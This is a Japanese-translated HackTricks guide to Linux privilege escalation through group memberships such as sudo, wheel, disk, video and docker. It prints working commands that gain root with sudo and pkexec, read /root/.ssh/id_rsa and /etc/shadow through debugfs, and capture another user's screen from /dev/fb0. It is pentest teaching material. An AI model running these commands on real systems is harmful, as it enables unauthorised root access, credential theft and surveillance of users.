Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
Translator workflow e90c803209 Translated to Japanese
2023-07-07 23:42:27 +00:00

10 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Sudo/Admin グループ

PE - 方法1

時にはデフォルトで(または一部のソフトウェアが必要とするために) /etc/sudoers ファイルの中に、次のような行があることがあります:

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# Allow members of group admin to execute any command
%admin 	ALL=(ALL:ALL) ALL

これは、sudoまたはadminグループに所属するユーザーはsudoとして何でも実行できることを意味します。

もし状況がそうであるなら、rootになるためには単に以下を実行するだけです:

sudo su

PE - メソッド2

すべてのsuidバイナリを見つけ、バイナリPkexecがあるかどうかを確認します:

find / -perm -4000 2>/dev/null

もし、バイナリファイルpkexecがSUIDバイナリであり、sudoまたはadminに所属している場合、おそらくpkexecを使用してバイナリをsudoとして実行できるでしょう。 以下の内容を確認してください:

cat /etc/polkit-1/localauthority.conf.d/*

以下では、どのグループがpkexecを実行することが許可されているか、および一部のLinuxではデフォルトでsudoまたはadminのいずれかのグループが表示されることがあります。

rootになるためには、次のコマンドを実行します:

pkexec "/bin/sh" #You will be prompted for your user password

もしpkexecを実行しようとして、以下のエラーが表示された場合:

polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized

権限がないわけではなく、GUIなしで接続されていないためです。この問題の回避策はこちらにあります:https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-3353509032つの異なるsshセッションが必要です:

{% code title="session1" %}

echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session

{% code title="session2" %}

pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec

{% endcode %}

Wheelグループ

時々デフォルトで/etc/sudoersファイルの中にこの行が見つかることがあります:

%wheel	ALL=(ALL:ALL) ALL

これは、wheelグループに所属するユーザーはsudoとして何でも実行できることを意味します。

もし上記が当てはまる場合、rootになるためには単に以下を実行するだけです:

sudo su

シャドウグループ

シャドウグループのユーザーは、/etc/shadow ファイルを読み取ることができます。

-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow

ディスクグループ

この特権は、マシン内のすべてのデータにアクセスできるため、ほぼルートアクセスと同等です。

ファイル:/dev/sd[a-z][1-9]

debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

注意してください、debugfsを使用するとファイルを書き込むこともできます。例えば、/tmp/asd1.txt/tmp/asd2.txtにコピーするには、次のようにします:

debugfs -w /dev/sda1
debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt

しかし、rootが所有するファイル/etc/shadow/etc/passwdなど)を書き込もうとすると、「Permission denied」のエラーが発生します。

Video Group

コマンドwを使用すると、システムにログインしているユーザーを見つけることができ、以下のような出力が表示されます:

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash

tty1は、ユーザーyossiが物理的にマシンの端末にログインしていることを意味します。

videoグループは、画面出力を表示する権限を持っています。基本的に、画面を観察することができます。これを行うには、現在の画面のイメージを生データで取得し、画面が使用している解像度を取得する必要があります。画面データは/dev/fb0に保存され、この画面の解像度は/sys/class/graphics/fb0/virtual_sizeで見つけることができます。

cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size

生のイメージ開くには、GIMPを使用し、screen.rawファイルを選択し、ファイルタイプとして生のイメージデータを選択します:

次に、画面で使用されている幅と高さを変更し、さまざまなイメージタイプを確認します(画面をより良く表示するものを選択します):

ルートグループ

デフォルトでは、ルートグループのメンバーは、特権をエスカレートするために使用できる一部のサービスの設定ファイルやライブラリファイルなど、他の興味深いものを変更することができるようです...

ルートメンバーが変更できるファイルを確認します

find / -group root -perm -g=w 2>/dev/null

Dockerグループ

ホストマシンのルートファイルシステムをインスタンスのボリュームにマウントすることができます。そのため、インスタンスが起動するとすぐにそのボリュームにchrootがロードされます。これにより、実質的にマシン上でroot権限を取得することができます。

{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}

{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}

lxc/lxdグループ

lxc - 特権エスカレーション

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥